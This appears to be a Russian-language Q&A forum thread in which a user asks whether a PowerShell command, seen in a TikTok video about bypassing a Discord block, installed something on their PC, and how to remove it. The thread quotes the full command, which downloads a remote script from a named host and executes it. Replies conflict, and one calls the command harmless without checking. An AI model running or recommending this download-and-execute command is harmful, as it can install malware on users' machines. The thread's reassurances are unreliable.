Может ли че то установится на пк от команды в win r

You48747464i 48747474fjhfc Ученик (144), на голосовании 2 недели назад
В тик токе увидел обход дс блока и тип показал команду Win + R
powershell irm ayugram.temp.swtest.ru/install.ps1 | iex, может ли че то быть и как от этого избавится (adwcleaner ниче не показывает, винда тоже не жалуется, единственное после ввода появляется консоль и красный текст ( не читал) и пропадает через секунду помогите пажэ
Голосование за лучший ответ
Виолетта Мохначева Знаток (389) 1 месяц назад
Да
You48747464i 48747474fjhfcУченик (144) 1 месяц назад
А как пофиксить
Виолетта МохначеваЗнаток (389) 1 месяц назад
Удалите корневую папку файла
А нет , ничего вредного в этом нет
Так ниче не скачалось в автозагрузке нету (через рег едит тож)
Тогда команда безвредна
нелезь Оракул (72377) 1 месяц назад
ламерский бред
Хз типы в комент ах просто пишут что троян/ратка/стиллер
MvC Просветленный (36648) 1 месяц назад
Это тема не просто может!-она что то устанавливает))
--
С сервера в обход антивируса что то загружает и устанавливает (вряд ли что то полезное)
Вован дэ'Морт Искусственный Интеллект (348256) 1 месяц назад
как раз из интернета что-то и устанавливается
ayugram.temp.swtest.ru/install.ps1
какой-то зашифрованный скрипт
А где это найти и впринципе как это исправить?
Че с ним делать, или винду сносить?
Вован дэ'Морт Искусственный Интеллект (348256) You48747464i 48747474fjhfc, я откуда знаю, что ты там ставил, может это обход блокировки а может фейк какой-то